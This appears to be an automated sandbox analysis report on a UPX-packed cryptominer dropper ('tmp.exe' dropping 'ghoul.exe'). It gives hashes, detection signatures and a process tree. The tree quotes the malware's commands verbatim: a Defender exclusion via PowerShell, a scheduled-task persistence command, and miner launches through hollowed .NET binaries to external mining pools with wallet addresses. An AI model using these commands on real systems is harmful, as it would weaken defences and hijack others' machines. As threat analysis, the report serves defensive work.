Overview

overview

9

Static

static

tmp.exe

windows7-x64

9

tmp.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    53s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    03/01/2023, 17:49

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    tmp.exe

  • Size

    1.5MB

  • MD5

    4c8d2d06487d07ec350aa5c5d699bb55

  • SHA1

    adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d

  • SHA256

    5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567

  • SHA512

    37f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab

  • SSDEEP

    24576:BjhhhkB/Aw/ApZAZv8743EDweFLBNlYesa49t03jN0AK+HoD5PD:Rhhh6FQcv883EDhp5x4S0AKp9

Score
9/10
minerupx

Malware Config

Signatures

  • Detectes Phoenix Miner Payload 4 IoCs
    miner
  • Executes dropped EXE 1 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Users\Admin\AppData\Local\Temp\ghoul.exe
      "C:\Users\Admin\AppData\Local\Temp\ghoul.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:524
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1896
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
          4⤵
          • Creates scheduled task(s)
          PID:1728
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RN9B8LkT5BcYXbc4ZVMYitfgKaA1wwbXwy.work -p x -t 3
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:816
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls
          4⤵
            PID:1136
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0x20caf9B2c7aB54C3cB949F1489DD697327131861.Rig001 -coin etc -log 0
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:1956

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\ghoul.exe
            Filesize

            899KB

            MD5

            813862d29c21094ebd1f95feb80771ff

            SHA1

            5e61691a9d791e798e19d99a27c9f9959d319e9b

            SHA256

            5f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a

            SHA512

            97fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ghoul.exe
            Filesize

            899KB

            MD5

            813862d29c21094ebd1f95feb80771ff

            SHA1

            5e61691a9d791e798e19d99a27c9f9959d319e9b

            SHA256

            5f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a

            SHA512

            97fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580

            Download Submit

          • \Users\Admin\AppData\Local\Temp\ghoul.exe
            Filesize

            899KB

            MD5

            813862d29c21094ebd1f95feb80771ff

            SHA1

            5e61691a9d791e798e19d99a27c9f9959d319e9b

            SHA256

            5f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a

            SHA512

            97fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580

            Download Submit

          • memory/524-65-0x000007FEEC050000-0x000007FEECBAD000-memory.dmp

            Filesize

            11.4MB

            Download

          • memory/524-68-0x00000000027BB000-0x00000000027DA000-memory.dmp

            Filesize

            124KB

            Download

          • memory/524-62-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

            Filesize

            8KB

            Download

          • memory/524-67-0x00000000027B4000-0x00000000027B7000-memory.dmp

            Filesize

            12KB

            Download

          • memory/524-63-0x000007FEECBB0000-0x000007FEED5D3000-memory.dmp

            Filesize

            10.1MB

            Download

          • memory/524-66-0x00000000027B4000-0x00000000027B7000-memory.dmp

            Filesize

            12KB

            Download

          • memory/700-60-0x0000000001170000-0x0000000001256000-memory.dmp

            Filesize

            920KB

            Download

          • memory/816-78-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-86-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-104-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-92-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-90-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-73-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-72-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-75-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-77-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-80-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-81-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-82-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-83-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-84-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/816-87-0x0000000140000000-0x00000001400C6000-memory.dmp

            Filesize

            792KB

            Download

          • memory/956-64-0x0000000004A86000-0x0000000004A97000-memory.dmp

            Filesize

            68KB

            Download

          • memory/956-54-0x00000000003F0000-0x000000000057C000-memory.dmp

            Filesize

            1.5MB

            Download

          • memory/956-55-0x0000000075891000-0x0000000075893000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1956-99-0x0000000140000000-0x000000014082B000-memory.dmp

            Filesize

            8.2MB

            Download

          • memory/1956-96-0x0000000140000000-0x000000014082B000-memory.dmp

            Filesize

            8.2MB

            Download

          • memory/1956-94-0x0000000140000000-0x000000014082B000-memory.dmp

            Filesize

            8.2MB

            Download

          • memory/1956-100-0x0000000140000000-0x000000014082B000-memory.dmp

            Filesize

            8.2MB

            Download

          • memory/1956-97-0x0000000140000000-0x000000014082B000-memory.dmp

            Filesize

            8.2MB

            Download

          • memory/1956-101-0x0000000140000000-0x000000014082B000-memory.dmp

            Filesize

            8.2MB

            Download

          • memory/1956-102-0x0000000140000000-0x000000014082B000-memory.dmp

            Filesize

            8.2MB

            Download

          • memory/1956-103-0x0000000140000000-0x000000014082B000-memory.dmp

            Filesize

            8.2MB

            Download

          • memory/1956-93-0x0000000140000000-0x000000014082B000-memory.dmp

            Filesize

            8.2MB

            Download